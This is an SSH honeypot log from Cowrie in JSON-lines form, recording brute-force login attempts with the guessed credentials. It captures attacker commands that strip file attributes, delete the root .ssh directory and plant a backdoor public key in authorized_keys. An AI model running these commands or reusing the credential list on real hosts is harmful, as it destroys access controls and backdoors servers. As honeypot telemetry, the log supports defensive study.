{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:05:27.219139Z","src_ip":"103.206.72.2","session":"0a1047207feb"}
{"eventid":"cowrie.session.connect","src_ip":"103.206.72.2","src_port":34348,"dst_ip":"1.2.3.4","dst_port":22,"session":"4942b82d34e0","protocol":"ssh","message":"New connection: 103.206.72.2:34348 (1.2.3.4:22) [session: 4942b82d34e0]","sensor":"my-vps","timestamp":"2025-09-08T20:05:27.389416Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:05:27.390448Z","src_ip":"103.206.72.2","session":"4942b82d34e0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:05:27.565966Z","src_ip":"103.206.72.2","session":"4942b82d34e0"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T20:05:28.299893Z","src_ip":"103.206.72.2","session":"4942b82d34e0"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:05:28.476571Z","src_ip":"103.206.72.2","session":"4942b82d34e0"}
{"eventid":"cowrie.session.closed","duration":"5.5","message":"Connection lost after 5.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:05:28.477549Z","src_ip":"103.206.72.2","session":"5588dd63adad"}
{"eventid":"cowrie.session.connect","src_ip":"216.107.136.92","src_port":43196,"dst_ip":"1.2.3.4","dst_port":22,"session":"0e1828162490","protocol":"ssh","message":"New connection: 216.107.136.92:43196 (1.2.3.4:22) [session: 0e1828162490]","sensor":"my-vps","timestamp":"2025-09-08T20:05:39.570584Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:05:39.571228Z","src_ip":"216.107.136.92","session":"0e1828162490"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:05:39.661279Z","src_ip":"216.107.136.92","session":"0e1828162490"}
{"eventid":"cowrie.login.failed","username":"dbadmin","password":"Welcome1","message":"login attempt [dbadmin/Welcome1] failed","sensor":"my-vps","timestamp":"2025-09-08T20:05:40.061339Z","src_ip":"216.107.136.92","session":"0e1828162490"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:05:41.153111Z","src_ip":"216.107.136.92","session":"0e1828162490"}
{"eventid":"cowrie.session.connect","src_ip":"77.75.56.63","src_port":49380,"dst_ip":"1.2.3.4","dst_port":22,"session":"035c4b41ef0b","protocol":"ssh","message":"New connection: 77.75.56.63:49380 (1.2.3.4:22) [session: 035c4b41ef0b]","sensor":"my-vps","timestamp":"2025-09-08T20:06:14.755211Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:06:14.756018Z","src_ip":"77.75.56.63","session":"035c4b41ef0b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:06:14.795259Z","src_ip":"77.75.56.63","session":"035c4b41ef0b"}
{"eventid":"cowrie.login.failed","username":"boris","password":"abc123","message":"login attempt [boris/abc123] failed","sensor":"my-vps","timestamp":"2025-09-08T20:06:15.004360Z","src_ip":"77.75.56.63","session":"035c4b41ef0b"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:06:16.045702Z","src_ip":"77.75.56.63","session":"035c4b41ef0b"}
{"eventid":"cowrie.session.connect","src_ip":"101.126.89.164","src_port":51368,"dst_ip":"1.2.3.4","dst_port":22,"session":"c25e4fc16b61","protocol":"ssh","message":"New connection: 101.126.89.164:51368 (1.2.3.4:22) [session: c25e4fc16b61]","sensor":"my-vps","timestamp":"2025-09-08T20:06:37.622648Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:06:37.623516Z","src_ip":"101.126.89.164","session":"c25e4fc16b61"}
{"eventid":"cowrie.session.connect","src_ip":"103.206.72.2","src_port":55846,"dst_ip":"1.2.3.4","dst_port":22,"session":"dfd9879dc01b","protocol":"ssh","message":"New connection: 103.206.72.2:55846 (1.2.3.4:22) [session: dfd9879dc01b]","sensor":"my-vps","timestamp":"2025-09-08T20:06:45.436339Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:06:45.440578Z","src_ip":"103.206.72.2","session":"dfd9879dc01b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:06:45.611053Z","src_ip":"103.206.72.2","session":"dfd9879dc01b"}
{"eventid":"cowrie.login.failed","username":"tcpdump","password":"tcpdump2025","message":"login attempt [tcpdump/tcpdump2025] failed","sensor":"my-vps","timestamp":"2025-09-08T20:06:46.302709Z","src_ip":"103.206.72.2","session":"dfd9879dc01b"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:06:47.479803Z","src_ip":"103.206.72.2","session":"dfd9879dc01b"}
{"eventid":"cowrie.session.connect","src_ip":"77.75.56.63","src_port":35920,"dst_ip":"1.2.3.4","dst_port":22,"session":"dfa39fc63521","protocol":"ssh","message":"New connection: 77.75.56.63:35920 (1.2.3.4:22) [session: dfa39fc63521]","sensor":"my-vps","timestamp":"2025-09-08T20:07:19.151284Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:07:19.152211Z","src_ip":"77.75.56.63","session":"dfa39fc63521"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:07:19.205915Z","src_ip":"77.75.56.63","session":"dfa39fc63521"}
{"eventid":"cowrie.login.success","username":"root","password":"Qwerty123!","message":"login attempt [root/Qwerty123!] succeeded","sensor":"my-vps","timestamp":"2025-09-08T20:07:19.443283Z","src_ip":"77.75.56.63","session":"dfa39fc63521"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:07:19.596910Z","src_ip":"77.75.56.63","session":"dfa39fc63521"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T20:07:19.597559Z","src_ip":"77.75.56.63","session":"dfa39fc63521"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T20:07:19.598614Z","src_ip":"77.75.56.63","session":"dfa39fc63521"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:07:19.687516Z","src_ip":"77.75.56.63","session":"dfa39fc63521"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:07:19.810788Z","src_ip":"77.75.56.63","session":"dfa39fc63521"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T20:07:19.811448Z","src_ip":"77.75.56.63","session":"dfa39fc63521"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T20:07:19.866586Z","src_ip":"77.75.56.63","session":"dfa39fc63521"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:07:19.867406Z","src_ip":"77.75.56.63","session":"dfa39fc63521"}
{"eventid":"cowrie.session.connect","src_ip":"77.75.56.63","src_port":35930,"dst_ip":"1.2.3.4","dst_port":22,"session":"ac14c5b9c7d7","protocol":"ssh","message":"New connection: 77.75.56.63:35930 (1.2.3.4:22) [session: ac14c5b9c7d7]","sensor":"my-vps","timestamp":"2025-09-08T20:07:20.233010Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:07:20.238187Z","src_ip":"77.75.56.63","session":"ac14c5b9c7d7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:07:20.447780Z","src_ip":"77.75.56.63","session":"ac14c5b9c7d7"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T20:07:21.264805Z","src_ip":"77.75.56.63","session":"ac14c5b9c7d7"}
{"eventid":"cowrie.session.connect","src_ip":"77.75.56.63","src_port":35934,"dst_ip":"1.2.3.4","dst_port":22,"session":"dd9a75254119","protocol":"ssh","message":"New connection: 77.75.56.63:35934 (1.2.3.4:22) [session: dd9a75254119]","sensor":"my-vps","timestamp":"2025-09-08T20:07:22.342460Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:07:22.343893Z","src_ip":"77.75.56.63","session":"dd9a75254119"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:07:22.380889Z","src_ip":"77.75.56.63","session":"dd9a75254119"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:07:22.469960Z","src_ip":"77.75.56.63","session":"ac14c5b9c7d7"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T20:07:22.585237Z","src_ip":"77.75.56.63","session":"dd9a75254119"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:07:22.646906Z","src_ip":"77.75.56.63","session":"dd9a75254119"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:07:22.651437Z","src_ip":"77.75.56.63","session":"dfa39fc63521"}
{"eventid":"cowrie.session.connect","src_ip":"216.107.136.92","src_port":56520,"dst_ip":"1.2.3.4","dst_port":22,"session":"911dde86c9a8","protocol":"ssh","message":"New connection: 216.107.136.92:56520 (1.2.3.4:22) [session: 911dde86c9a8]","sensor":"my-vps","timestamp":"2025-09-08T20:07:25.441346Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:07:25.442177Z","src_ip":"216.107.136.92","session":"911dde86c9a8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:07:25.532518Z","src_ip":"216.107.136.92","session":"911dde86c9a8"}
{"eventid":"cowrie.login.success","username":"root","password":"w3LC0M31","message":"login attempt [root/w3LC0M31] succeeded","sensor":"my-vps","timestamp":"2025-09-08T20:07:25.935129Z","src_ip":"216.107.136.92","session":"911dde86c9a8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:07:26.157071Z","src_ip":"216.107.136.92","session":"911dde86c9a8"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T20:07:26.157790Z","src_ip":"216.107.136.92","session":"911dde86c9a8"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T20:07:26.158540Z","src_ip":"216.107.136.92","session":"911dde86c9a8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:07:26.249927Z","src_ip":"216.107.136.92","session":"911dde86c9a8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:07:26.483840Z","src_ip":"216.107.136.92","session":"911dde86c9a8"}
